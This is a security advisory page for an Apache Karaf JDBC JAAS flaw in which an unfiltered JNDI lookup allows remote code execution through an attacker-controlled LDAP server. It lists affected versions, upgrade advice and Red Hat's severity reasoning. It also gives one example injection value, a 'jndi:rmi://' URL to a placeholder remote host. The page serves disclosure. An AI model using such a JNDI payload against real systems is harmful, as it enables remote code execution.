Back

CRITICAL

Apache Karaf: JDBC JAAS LDAP injection

Published Dec 21, 2022

Description

This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.

The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.

This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.

We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8

Affected products

Remediation

Red Hat statement

This attack requires previous control of the LDAP target server in order to obtain access and perform code execution. Considering the pre-requisites for this vulnerability to be exploited, the impact is Important and not Critical.

Red Hat mitigation

No mitigation is currently available.

References (11)

Change history (0)

No recorded changes yet.

Sources

CVE.org / MITRE

Status PUBLISHED
Assigner apache
Published Dec 21, 2022
Updated Apr 15, 2025
Reserved Sep 7, 2022

CISA Vulnrichment

Updated Apr 15, 2025

NVD

Status Modified
Modified Jun 17, 2026

Red Hat

Severity Important
Public date Dec 21, 2022
Bugzilla 2257304

ENISA EUVD

Assigner apache
Published Dec 21, 2022
Updated Apr 15, 2025